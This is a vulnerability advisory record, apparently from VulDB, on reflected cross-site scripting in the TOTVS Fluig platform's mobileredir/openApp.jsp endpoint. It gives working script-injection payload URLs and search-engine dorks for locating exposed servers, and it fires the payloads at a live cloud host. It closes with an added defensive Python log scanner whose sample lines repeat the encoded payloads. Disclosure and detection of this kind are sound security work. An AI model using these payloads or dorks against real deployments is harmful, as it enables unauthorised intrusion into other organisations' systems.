| Title | TOTVS Fluig Platform 1.6.X - 1.8.1 Cross-Site Scripting |
|---|
| Description | TOTVS Fluig Platform 1.6.X - 1.8.1 - Cross-Site Scripting
The TOTVS Fluig platform, in versions 1.6.1.X through 1.8.1, is vulnerable to Cross-Site Scripting via the 'redirectUrl' and 'user' parameters of the 'mobileredir' module.
Fluig is the productivity and collaboration platform that integrates with the ERP system of TOTVS, Brazil's largest technology company; it is hosted on the customer's own server.
Versions affected:
--
Fluig 1.6.X - Fluig 1.8.1
…
Attack Vector
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl=
https://fluig.host.com/mobileredir/openApp.jsp?user=
Payloads:
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script>
https://fluig.host.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
Dorks
Shodan:
https://www.shodan.io/search?query=fluig1
Google Dork:
inurl:"/portal/home" intitle:"Fluig"
intitle:fluig
Examples using a system hosted on TOTVS's Fluig cloud:
https://mobile.fluig.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script>
https://mobile.fluig.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
|
|---|
| User | erickfernandox (UID 57733) |
|---|
| Submission | 11/11/2023 00:57 (2 years ago) |
|---|
| Moderation | 11/24/2023 08:40 (13 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 246104 [TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1 mobileredir /mobileredir/openApp.jsp redirectUrl/user cross site scripting] |
|---|
| Points | 17 |
|---|
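As an added, defensive example that is not part of the submission above: a Python check that flags access-log requests to the openApp.jsp endpoint whose 'redirectUrl' or 'user' values decode to HTML markup. The log format and sample lines are constructed for the example; the path and parameter names come from the advisory.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Endpoint and parameters named in the advisory above.
VULN_PATH = "/mobileredir/openApp.jsp"
VULN_PARAMS = ("redirectUrl", "user")

# Heuristic for markup that has no place in a redirect URL or a user name: a tag
# opener, a quote closing an attribute followed by '>', an event-handler attribute,
# or a javascript: scheme.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|[\"']\s*>|\bon[a-z]+\s*=|javascript:", re.I)

# Combined-format access log line: client, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def suspicious_params(target):
    """Return the advisory's parameters whose decoded value carries markup."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes once
    hits = []
    for name in VULN_PARAMS:
        for value in qs.get(name, []):
            # Decode once more so a single extra layer of percent-encoding
            # does not hide the markup from the check.
            if MARKUP_RE.search(unquote_plus(value)):
                hits.append(name)
                break
    return hits


def scan_log(lines):
    """Yield (client, timestamp, status, params) for requests carrying markup."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, _method, target, status = m.groups()
        params = suspicious_params(target)
        if params:
            yield client, ts, int(status), params


# Constructed sample log lines, not taken from any real Fluig deployment.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Nov/2023:00:57:01 +0000] "GET /mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.4 - - [11/Nov/2023:00:58:13 +0000] "GET /mobileredir/openApp.jsp?user=alice&redirectUrl=fluig://open HTTP/1.1" 200 480',
    '203.0.113.7 - - [11/Nov/2023:00:59:40 +0000] "GET /mobileredir/openApp.jsp?user=%2522%253E%253Cscript%253Ealert(document.domain)%253C/script%253E HTTP/1.1" 200 512',
    '192.0.2.9 - - [11/Nov/2023:01:00:02 +0000] "GET /portal/home?q=%3Cb%3Ehi%3C/b%3E HTTP/1.1" 200 2048',
]
```

A 200 response to a flagged request shows the server still reflected the value; after patching, the same scan is a cheap regression check that the endpoint no longer serves such requests unchanged.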